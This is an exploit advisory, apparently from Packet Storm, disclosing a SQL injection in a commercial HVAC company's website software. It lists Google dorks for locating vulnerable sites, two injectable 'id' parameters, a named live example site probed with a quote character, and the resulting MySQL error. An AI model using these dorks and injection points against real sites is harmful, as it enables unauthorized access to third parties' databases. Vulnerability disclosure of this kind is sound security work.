TotalComfortSolutions Company 1.0 SQL Injection

2018-12-31T00:00:00
ID PACKETSTORM:150956
Type packetstorm
Reporter KingSkrupellos
Modified 2018-12-31T00:00:00

Description

                                        
                                            `############################################################  
  
# Exploit Title : TotalComfortSolutions Company 1.0 SQL Injection  
# Author [ Discovered By ] : KingSkrupellos  
# Date : 30/12/2018  
# Vendor Homepages : totalcomfortsolutions.com  
# Tested On : Windows and Linux  
# Exploit Risk : Medium  
# Category : WebApps  
# Version Information : jQuery 1.4.11 - CodeIgniter - ExpressionEngine CMS  
# CWE : CWE-89 [ Improper Neutralization of  
Special Elements used in an SQL Command ('SQL Injection') ]  
# CXSecurity Exploit Reference Link : cxsecurity.com/ascii/WLB-2018050285  
  
############################################################  
  
Total Comfort Solutions A Commercial Heating and  
Air Conditioning Company SQL Injection Vulnerability  
  
############################################################  
  
# Description About the Product : Total Comfort Solutions  
offers the skilled development and delivery of innovative Heating,  
Ventilation, and Air Conditioning (HVAC) solutions to clients  
across South Carolina and eastern Georgia.  
  
Total Comfort Solutions, a commercial heating and  
air conditioning (HVAC) company, services, repairs, and performs  
preventative maintenance focusing on Healthcare,  
Industrial, Office buildings and Data centers in Charleston,  
Columbia, Florence, Myrtle Beach, SC and Augusta, GA.  
  
############################################################  
  
# Google Dork 1 : inurl:''/totalcomfort/aboutus.php?id=''  
  
# Google Dork 2 : inurl:''/totalcomfort/resources.php?id=''  
  
# Google Dork 3 : intext:''Total Comfort Solutions'''  
  
# Exploit : /totalcomfort/aboutus.php?id=[SQL Injection]  
  
# Exploit : /totalcomfort/resources.php?id=[SQL Injection]  
  
############################################################  
  
# Example Site =>  
  
dealerbranded.com/totalcomfort/aboutus.php?id=101%27  
  
[ Proof of Concept for SQL Injection ] => archive.is/OZwf1  
  
############################################################  
  
# Error : You have an error in your SQL syntax; check  
the manual that corresponds to your MySQL  
server version for the right syntax to use near ''444''  
or navigation.pagename = ''' at line 1  
  
############################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team  
  
############################################################  
`